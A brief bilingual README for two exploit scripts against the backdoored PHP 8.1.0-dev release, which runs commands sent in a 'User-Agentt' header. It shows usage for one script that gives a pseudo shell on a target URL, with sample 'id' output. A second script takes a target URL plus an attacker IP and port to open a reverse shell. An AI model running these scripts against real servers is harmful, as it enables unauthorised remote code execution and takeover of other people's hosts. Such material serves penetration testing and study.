
PHP 8.1.0-dev Backdoor System Shell Script
PHP 8.1.0-dev 后门系统 Shell 脚本

PHP 8.1.0-dev 版本于 2021 年 3 月 28 日发布时内置了一个后门,但该后门很快被发现并移除。如果服务器运行此版本的 PHP,攻击者可通过发送 User-Agentt 头来执行任意代码。
问题被发现后,原始代码已被恢复,但随后又遭到第二次篡改。该入侵会在任何运行了被篡改版本 PHP 的网站上创建后门,使黑客能够在站点上执行远程代码。
阅读完整文章:https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
这份简短的漏洞利用脚本 backdoor_php_8.1.0-dev.py 利用该后门在主机上提供一个伪系统 Shell。可在 Exploit DB 上找到它。
用法:
┌──(user㉿kali)-[~/Documents]
└─$ python3 backdoor_php_8.1.0-dev.py
Enter the host url:
http://a.b.c.d
Interactive shell is opened on http://a.b.c.d
Can't acces tty; job crontol turned off.
$ id
uid=1000(user) gid=1000(user) groups=1000(user)
这份简短的漏洞利用脚本 revshell_php_8.1.0-dev.py 可在目标上提供反弹 Shell。
用法:
┌──(user㉿kali)-[~/Documents]
└─$ python3 revshell_php_8.1.0-dev.py <target URL> <attacker IP> <attacker PORT>

保持好奇,学习就是生活! 😃